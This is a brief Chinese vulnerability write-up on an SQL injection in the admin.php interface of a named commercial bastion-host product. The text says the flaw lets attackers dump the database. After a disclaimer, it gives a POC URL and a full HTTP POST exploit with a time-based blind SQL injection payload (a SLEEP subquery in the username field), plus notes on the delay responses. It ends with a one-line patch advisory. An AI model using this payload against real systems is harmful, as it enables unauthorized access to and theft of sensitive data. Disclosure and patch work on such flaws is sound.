某堡垒机SQL注入漏洞

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

一、概述

      中远麒麟堡垒机能够提供细粒度的访问控制,最大限度保护用户资源的安全。麒麟堡垒机存在SQL注入漏洞漏洞。

二、漏洞危害

       中远麒麟堡垒机admin.php接口处存在sql注入漏洞，攻击者可通过该漏洞获取数据库敏感信息及拖库。

三、漏洞复现

登录界面

POC:

https://ip:port/admin.php?controller=admin_commonuser 

出现此回显，则说明漏洞存在 

EXP：

 
POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
 
username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))ptGN) AND '1'='1

 burp启动！！！ 

sleep5秒

 sleep10秒

四、修复建议

    官方已经发布修复补丁，请进行升级。